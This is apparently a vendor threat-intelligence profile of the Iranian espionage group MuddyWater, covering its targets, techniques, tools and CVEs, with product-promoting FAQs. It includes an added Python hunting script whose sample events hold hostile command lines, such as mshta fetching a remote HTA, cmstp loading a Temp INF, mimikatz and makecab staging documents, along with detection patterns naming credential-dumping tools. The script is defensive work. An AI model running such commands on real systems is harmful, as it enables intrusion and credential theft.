MuddyWater
MuddyWater is an Iranian-linked cyber espionage group active since at least 2017, known for targeting global government, telecommunications, defense, and energy sectors through sophisticated spear-phishing and exploitation techniques.

The Origin of MuddyWater
MuddyWater, also known as STATIC KITTEN, Earth Vetala, MERCURY, Seedworm, Mango Sandstorm, and TEMP.Zagros, is an advanced persistent threat (APT) group identified as part of Iran’s Ministry of Intelligence and Security (MOIS). Active since at least 2017, MuddyWater specializes in cyber espionage operations, utilizing a variety of sophisticated techniques and custom malware for its campaigns. The group is notably adaptive, consistently evolving tactics and malware to evade detection and defenses.
Targeted Countries
MuddyWater’s victims span globally, particularly in the Middle East, Eurasia, and Central Asia, prominently targeting Turkey, Tajikistan, the Netherlands, Azerbaijan, Armenia, Pakistan, Iraq, Oman, Saudi Arabia, United Arab Emirates, Syria, Afghanistan, India, Jordan, Israel, Palestine, Turkmenistan, Georgia, Malta, Germany, and the United States. Such geographic diversity demonstrates their extensive international espionage campaigns.
Targeted Industries
MuddyWater has conducted operations against diverse sectors including government entities, military organizations, telecommunications, academia, oil and gas, aviation, healthcare, NGOs, technology, financial services, hospitality, agriculture, energy, pharmaceuticals, real estate, aerospace, and local governments. The broad targeting indicates a strategic interest in sectors critical to national infrastructure and information control.
Known Victims
Specific known attacks include recent campaigns (2025) against multiple Israeli academic institutions, reflecting a sustained interest in Middle Eastern political dynamics. Additionally, governmental, defense, telecommunications, and energy organizations in various countries have been repeatedly targeted over the group's operational history.
MuddyWater's Attack Method

Initial access is gained primarily via targeted spear-phishing emails (malicious attachments or links), compromised third-party accounts, or exploitation of known vulnerabilities in Microsoft Exchange and Office products.

MuddyWater bypasses User Account Control (UAC) and uses DLL side-loading to obtain elevated access.

Uses obfuscation methods including Base64 encoding and steganography, and abuses legitimate system binaries (LOLBins) such as CMSTP, Mshta, and Rundll32 to evade defenses.

Employs credential dumping tools like Mimikatz, LaZagne, and Browser64 to extract credentials from LSASS memory, web browsers, email clients, and cached domain credentials.

Uses scripts and custom malware for account enumeration, file and directory scanning, and software discovery, including security products.

Utilizes legitimate remote access solutions such as Remote Utilities, SimpleHelp, Atera Agent, and ScreenConnect to move laterally within compromised networks.

Screenshot capture and staging of collected data into archives with native utilities (makecab.exe) are standard practice.

Executes payloads through PowerShell, the Windows Command Shell, VBScript, Python, and JavaScript, as well as through remote access tools.

Exfiltrates data via command-and-control (C2) channels using encrypted and obfuscated communications over HTTP/DNS protocols.

The primary goal is cyber espionage: the theft of sensitive, strategic, and classified information rather than disruptive attacks.
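As an added example (not code from the original page or from Vectra AI), the following Python script turns the behaviours listed above into hunting rules and runs them over a handful of constructed Sysmon-style process-creation events: a LOLBin (CMSTP, Mshta, Rundll32) spawned by an Office application or fed a URL or a user-writable path, a known credential-dumping tool name, makecab.exe invoked from a shell to stage an archive, and a remote access product that is not on the organisation's approved list. The event records, the executable names assumed for the remote access products, and the "sanctioned" list are all assumptions for illustration and must be tuned to the environment.

```python
"""Hunting rules for MuddyWater-style behaviours over process-creation events.

Added example, not part of the original page. Events are constructed; the
remote-access binary names and the sanctioned-tool list are assumptions.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 style records, trimmed to the fields the rules need.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /s C:\Users\alice\AppData\Local\Temp\setup.inf",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"id": 2, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/page.hta",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 3, "image": r"C:\Windows\System32\rundll32.exe",   # benign control-panel launch
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 4, "image": r"C:\Users\alice\Downloads\tools\mimikatz.exe",
     "cmdline": "mimikatz.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 5, "image": r"C:\Windows\System32\makecab.exe",
     "cmdline": r"makecab.exe C:\Users\alice\Documents\q3-plans.docx C:\ProgramData\out\1.cab",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 6, "image": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe", "parent": r"C:\Windows\System32\services.exe"},
    {"id": 7, "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
     "cmdline": "AteraAgent.exe", "parent": r"C:\Windows\System32\services.exe"},
]

LOLBINS = {"cmstp.exe", "mshta.exe", "rundll32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
CRED_TOOLS = ("mimikatz", "lazagne", "browser64")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\programdata\\|\\temp\\|\\appdata\\", re.I)
URL = re.compile(r"https?://", re.I)
# Assumed path markers for the remote access products named on the page (tune per environment).
RMM_MARKERS = {"screenconnect": "ScreenConnect", "ateraagent": "Atera Agent",
               "rutserv": "Remote Utilities", "simplehelp": "SimpleHelp"}
SANCTIONED_RMM = {"Atera Agent"}   # assumption: the organisation's approved remote tool


@dataclass
class Alert:
    event_id: int
    rule: str
    severity: str
    detail: str


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_lolbin(ev):
    """LOLBin launched by an Office app, or handed a URL / user-writable path."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if img not in LOLBINS:
        return None
    if parent in OFFICE_PARENTS:
        return Alert(ev["id"], "lolbin_office_child", "high", f"{img} spawned by {parent}")
    if URL.search(cmd) or USER_WRITABLE.search(cmd):
        return Alert(ev["id"], "lolbin_untrusted_input", "medium", f"{img} with untrusted input: {cmd}")
    return None


def rule_credential_tool(ev):
    """Known credential-dumping tool name in the image path or command line."""
    hay = (ev["image"] + " " + ev["cmdline"]).lower()
    hits = [t for t in CRED_TOOLS if t in hay]
    return Alert(ev["id"], "credential_dumping_tool", "high", ", ".join(hits)) if hits else None


def rule_staging(ev):
    """makecab.exe driven from a shell/script host and packing user data."""
    if basename(ev["image"]) == "makecab.exe" and basename(ev["parent"]) in SHELL_PARENTS \
            and USER_WRITABLE.search(ev["cmdline"]):
        return Alert(ev["id"], "collection_staging", "medium", ev["cmdline"])
    return None


def rule_unsanctioned_rmm(ev):
    """Remote access product running that is not on the approved list."""
    path = ev["image"].lower()
    for marker, product in RMM_MARKERS.items():
        if marker in path and product not in SANCTIONED_RMM:
            return Alert(ev["id"], "unsanctioned_rmm", "medium", product)
    return None


RULES = (rule_lolbin, rule_credential_tool, rule_staging, rule_unsanctioned_rmm)


def run_rules(events):
    """Return every alert raised by every rule, in event order."""
    return [a for ev in events for rule in RULES if (a := rule(ev)) is not None]


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(f"event {alert.event_id}: [{alert.severity}] {alert.rule}: {alert.detail}")
```

Events 3 (a routine Rundll32 launch from Explorer) and 7 (the approved remote tool) produce no alert, which is the point of the parent-process and allowlist conditions: Rundll32, makecab and remote access software are all common in healthy environments, so the rules key on context rather than on the binary name alone.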

TTPs Used by MuddyWater
How to Detect MuddyWater with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate an APT attack.
FAQs
Who is behind MuddyWater?
MuddyWater is attributed to Iran’s Ministry of Intelligence and Security (MOIS).
What are MuddyWater’s primary attack vectors?
They use spear-phishing emails with malicious attachments or links, and exploit vulnerabilities in public-facing applications.
How does MuddyWater evade defenses?
They employ various obfuscation methods, legitimate tools, steganography, and DLL side-loading.
Which malware tools are associated with MuddyWater?
POWERSTATS, NTSTATS, CloudSTATS, PowGoop, Blackwater, ForeLord, MoriAgent, and others.
Which industries does MuddyWater target?
Telecommunications, defense, academia, oil and gas, healthcare, technology, NGOs, and government entities.
Which tools can detect MuddyWater’s activities?
Organizations should leverage advanced Network Detection and Response (NDR) solutions like Vectra AI.
What can organizations do to defend against MuddyWater attacks?
Organizations should apply security patches promptly, educate users on spear-phishing awareness, enforce multifactor authentication, and monitor network traffic and user activity closely.
Does MuddyWater leverage vulnerabilities?
Yes, they exploit vulnerabilities like CVE-2020-0688 (Microsoft Exchange), CVE-2017-0199 (Office), and CVE-2020-1472 (Netlogon).
Does MuddyWater have global reach?
Yes. While primarily active in the Middle East and Asia, MuddyWater targets entities worldwide, including in North America and Europe.
How can an organization detect MuddyWater’s lateral movement?
Organizations can effectively detect lateral movement associated with MuddyWater by utilizing advanced Network Detection and Response (NDR) solutions such as Vectra AI. Vectra AI leverages artificial intelligence and machine learning algorithms to continuously monitor network traffic, quickly identifying abnormal behaviors like unauthorized remote access tool usage, suspicious internal connections, and unexpected credential usage patterns. By providing real-time visibility and prioritized threat alerts, Vectra AI empowers security teams to rapidly identify and contain threats posed by MuddyWater before significant damage occurs.